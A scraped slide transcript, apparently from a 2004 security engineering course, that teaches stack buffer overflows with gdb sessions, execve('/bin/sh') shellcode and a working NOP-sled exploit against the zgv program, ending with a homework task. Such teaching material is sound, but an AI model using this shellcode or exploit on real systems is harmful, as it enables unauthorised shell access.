Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }

Published bySilvia Evans Modified over 8 years ago

Similar presentations

Presentation on theme: "1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }"— Presentation transcript:

1 1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }

2 2

3 3 gcc -ggdb b.c –This creates a.out gdb a.out GNU gdb Red Hat Linux (5.2.1-4) Copyright 2002 Free Software Foundation, Inc.

4 4 (GDB) disas main Dump of assembler code for function main: 0x8048388 : push %ebp 0x8048389 : mov %esp,%ebp 0x804838b : sub $0x8,%esp 0x804838e : and $0xfffffff0,%esp 0x8048391 : mov $0x0,%eax 0x8048396 : sub %eax,%esp 0x8048398 : call 0x804835c 0x804839d : mov $0x0,%eax 0x80483a2 : leave 0x80483a3 : ret End of assembler dump.

5 5 (gdb) disas silly Dump of assembler code for function silly: 0x804835c : push %ebp 0x804835d : mov %esp,%ebp 0x804835f : sub $0x28,%esp 0x8048362 : sub $0xc,%esp 0x8048365 : lea 0xffffffd8(%ebp),%eax 0x8048368 : push %eax 0x8048369 : call 0x804827c

6 6 0x804836e : add $0x10,%esp 0x8048371 : sub $0x8,%esp 0x8048374 : lea 0xffffffd8(%ebp),%eax 0x8048377 : push %eax 0x8048378 : push $0x8048404 0x804837d : call 0x804829c 0x8048382 : add $0x10,%esp 0x8048385 : leave 0x8048386 : ret End of assembler dump.

7 7 $ gdb a.out GNU gdb Red Hat Linux (5.2.1-4) [...] (gdb) run Starting program: /home/sherif/c/bo/a.out AAAAAAAAAA Program exited normally.

8 8 (gdb) run Starting program: /home/sherif/c/bo/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGTRAP, Trace/breakpoint trap. 0x421341e9 in environ () from /lib/i686/libc.so.6

9 9 Starting program: /home/sherif/c/bo/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info registers eax 0x7b 123 ecx 0x42134d80 1108561280 edx 0x7b 123 ebx 0x4213820c 1108574732 esp 0xbffff370 0xbffff370 ebp 0x41414141 0x41414141 esi 0x40013020 1073819680 edi 0x421341e8 1108558312 eip 0x41414141 0x41414141 eflags 0x10282 66178

10 10 #include void notcalled(){ puts("no one called me!\n"); } void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }

11 11 (gdb) disas notcalled Dump of assembler code for function notcalled: 0x804838c : push %ebp 0x804838d : mov %esp,%ebp 0x804838f : sub $0x8,%esp 0x8048392 : sub $0xc,%esp 0x8048395 : push $0x804844c 0x804839a : call 0x80482ac 0x804839f : add $0x10,%esp 0x80483a2 : leave 0x80483a3 : ret End of assembler dump.

12 12 (gdb) run Starting program: /home/sherif/c/bo/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNO PQRSTUVWXYZ Program received signal SIGSEGV, Segmentation fault. 0x53525150 in ?? () (gdb) info register

13 13 eax 0x38 56 ecx 0x42134d80 1108561280 edx 0x38 56 ebx 0x4213820c 1108574732 esp 0xbffff880 0xbffff880 ebp 0x4f4e4d4c 0x4f4e4d4c esi 0x40013020 1073819680 edi 0x421341e8 1108558312 eip 0x53525150 0x53525150 [...]

14 14

15 15 main(){ printf( "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNO%c%c%c%cTU VWXYZ\n", 0x8c, 0x83, 0x04, 0x08 ); }

16 16 [sherif@rnd bo]$./b2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKL MNTUVWXYZ [sherif@rnd bo]$./b2 |./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKL MNTUVWXYZ no one called me! Segmentation fault

17 17 Dump of assembler code for function execve: 0xb09d0 : push %ebp 0xb09d1 : mov %esp,%ebp 0xb09d3 : sub $0x18,%esp 0xb09d6 : mov %ebx,0xfffffff4(%ebp) 0xb09d9 : call 0x1579d 0xb09de : add $0x8984e,%ebx 0xb09e4 : mov %edi,0xfffffffc(%ebp) 0xb09e7 : mov 0x1b8(%ebx),%eax 0xb09ed : mov 0x8(%ebp),%edi 0xb09f0 : mov %esi,0xfffffff8(%ebp) 0xb09f3 : test %eax,%eax 0xb09f5 : jne 0xb0a30 0xb09f7 : mov 0xc(%ebp),%ecx 0xb09fa : mov 0x10(%ebp),%edx 0xb09fd : push %ebx 0xb09fe : mov %edi,%ebx 0xb0a00 : mov $0xb,%eax 0xb0a05 : int $0x80

18 18.global code_start.global code_end.data code_start: jmp my_st_pt my_call: popl %esi movl %esi,0x8(%esi) xor %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0*/ movl %eax,0xc(%esi) /* another 0 to */ my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* " /bin/sh ", lea 0x8(%esi),%ecx /* & of "/bin/sh " xor %edx,%edx /* NULL )*/ int $0x80 /* */ my_st_pt: call my_call.string "/bin/shX" code_end:

19 19 extern void code_start(); extern void code_end(); #include main() { ((void (*)(void)) code_start)(); }

20 20 extern void code_start(); extern void code_end(); #include main() { char *p = (char*) code_start; printf("char code[]={"); while(*p){ printf("0x%x, ", (unsigned char)*p++); } printf("};"); }

21 21 char code[]={0xeb, 0x17, 0x5e, 0x89, 0x76, 0x8, 0x31, 0xc0, 0x88, 0x46, 0x7, 0x89, 0x46, 0xc, 0xb0, 0xb, 0x89, 0xf3, 0x8d, 0x4e, 0x8, 0x31, 0xd2, 0xcd, 0x80, 0xe8, 0xe4, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x58, 0x00 };

22 22 char code[]={0xeb, 0x17, 0x5e, 0x89, 0x76, 0x8, 0x31, 0xc0, 0x88, 0x46, 0x7, 0x89, 0x46, 0xc, 0xb0, 0xb, 0x89, 0xf3, 0x8d, 0x4e, 0x8, 0x31, 0xd2, 0xcd, 0x80, 0xe8, 0xe4, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x58, 0x00 }; main(){ ((void (*)(void)) code )(); }

23 23

24 24 #include main(){ char *params[]={"/bin/ls", "/", NULL}; char *env[]={"TERM=dumb", NULL}; execve("/bin/ls", params, env); }

25 25.global code_start.global code_end.data code_start: jmp my_st_pt my_call: popl %esi movl %esi,0x8(%esi) xor %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0*/ movl %eax,0xc(%esi) /* another 0 to */ my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* " /bin/sh ", lea 0x8(%esi),%ecx /* & of "/bin/sh " xor %edx,%edx /* NULL )*/ int $0x80 /* */ my_st_pt: call my_call.string "/bin/shX" code_end:

26 26 #include /* This is the minimal shellcode from the tutorial */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\ x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe 4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; #define NOP 0x90 #define LEN 1032 #define RET 0xbffff574

27 27 int main(){ char buffer[LEN]; long retaddr = RET; int i; fprintf(stderr,"using address 0x%lx\n",retaddr); for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr; for (i=0;i<(LEN-strlen(shellcode)-100);i++) *(buffer+i) = NOP; memcpy(buffer+i,shellcode,strlen(shellcode)); setenv("HOME", buffer, 1); execlp("zgv","zgv",NULL); return 0; }

28 28 CSCI 485 04: Security EngineeringSpring 2004 Assignment 3: Due Tuesday, March 16th, 2004 A colleague has proposed the following program as a simple means of copying the first command-line argument to a local variable. You are asked to demonstrate that is an insecure program by showing that it may allow for the execution of an arbitrary command. #include main(int argc, char** argv){ char s[1000]; strcpy(s, argv[1]); puts(s); }

Download ppt "1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }"

Similar presentations

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
15-213 Recitation 4: 09/30/02 Outline The Stack! Essential skill for Lab 3 –Out-of-bound array access –Put your code on the stack Annie Luo

Recitation 4: 09/30/02 Outline The Stack! Essential skill for Lab 3 –Out-of-bound array access –Put your code on the stack Annie Luo
Gnu Debugger (GDB) Topics Overview Quick Reference Card Readings: Quick Reference Card February 7, 2012 CSCE 212Honors Computer Organization.

Gnu Debugger (GDB) Topics Overview Quick Reference Card Readings: Quick Reference Card February 7, 2012 CSCE 212Honors Computer Organization.
Advanced Buffer Overflow Methods

Advanced Buffer Overflow Methods
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
UBC104 Embedded Systems Variables, Structures & Pointers.

UBC104 Embedded Systems Variables, Structures & Pointers.
Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.

Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
1 Homework Reading –PAL, pp 201-216, 297-312 Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
UBC104 Embedded Systems Functions & Pointers.

UBC104 Embedded Systems Functions & Pointers.
Foundations of Network and Computer Security J J ohn Black Lecture #18 Oct 28 th 2004 CSCI 6268/TLEN 5831, Fall 2004.

Foundations of Network and Computer Security J J ohn Black Lecture #18 Oct 28 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.

Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
C Prog. To Object Code text text binary binary Code in files p1.c p2.c

C Prog. To Object Code text text binary binary Code in files p1.c p2.c
Foundations of Network and Computer Security J J ohn Black Lecture #18 Nov 1 st 2005 CSCI 6268/TLEN 5831, Fall 2005.

Foundations of Network and Computer Security J J ohn Black Lecture #18 Nov 1 st 2005 CSCI 6268/TLEN 5831, Fall 2005.
Attacks Using Stack Buffer Overflow Boxuan Gu

Attacks Using Stack Buffer Overflow Boxuan Gu
Recitation 2: Assembly & gdb Andrew Faulring 15213 Section A 16 September 2002.

Recitation 2: Assembly & gdb Andrew Faulring Section A 16 September 2002.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

Similar presentations

Ads by Google